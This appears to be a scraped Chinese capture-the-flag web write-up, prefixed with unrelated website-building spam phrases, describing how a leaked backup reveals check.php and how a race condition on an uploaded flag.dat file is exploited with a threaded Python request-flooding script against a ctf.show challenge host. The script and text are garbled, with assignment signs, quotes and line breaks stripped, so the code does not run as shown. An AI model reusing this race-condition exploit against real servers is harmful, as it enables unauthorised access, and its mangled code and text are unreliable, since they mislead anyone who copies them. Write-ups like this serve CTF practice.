西安的网站制作公司,查询公司水利平台网站,成都装饰网站建设,给个免费的网址0x00 前言
CTF 加解密合集CTF Web合集
0x01 题目 0x02 Write Up
首先跑一下字典#xff0c;这里用的dirmap,可以看到有一个web.zip 下载下来之后发现是一个网站备份#xff0c;备份的是check.php.bak
然后接着看#xff0c;可以看到这里不太可能是sql注入#xff0c;有…0x00 前言
CTF 加解密合集CTF Web合集
0x01 题目 0x02 Write Up
首先跑一下字典这里用的dirmap,可以看到有一个web.zip 下载下来之后发现是一个网站备份备份的是check.php.bak
然后接着看可以看到这里不太可能是sql注入有一个请求 check.php?tokentokenphp://input 正好接着上一个文件备份的内容看一下源码 首先token是将date(i)进行md5然后就是文件md5对比要求md5一致但是sha512不一样这里比较的文件是key.dat
直接访问进行下载即可。
原理就是将上传的文件保存为flag.dat,然后进行对比那么这种情况肯定会出现条件竞争也就是说flag.dat在比较完第一次之后被覆盖了的话就可以满足第二个条件
import requests
import time
import hashlib
import threadingistr(time.localtime().tm_min)
mhashlib.md5(i.encode()).hexdigest()def go_to(data):try:urlfhttp://1babff5a-576a-48b8-9f50-d4feeb5b7cbd.challenge.ctf.show/check.php?token{m}php://inputsrequests.post(url,datadata)print(s.text)except Exception as e:passwith open(key.dat,rb) as t:data1t.read()pass
for i in range(20):threading.Thread(targetgo_to,args(data1,)).start()
for i in range(20):data2abbcdthreading.Thread(targetgo_to,args(data2,)).start()以上
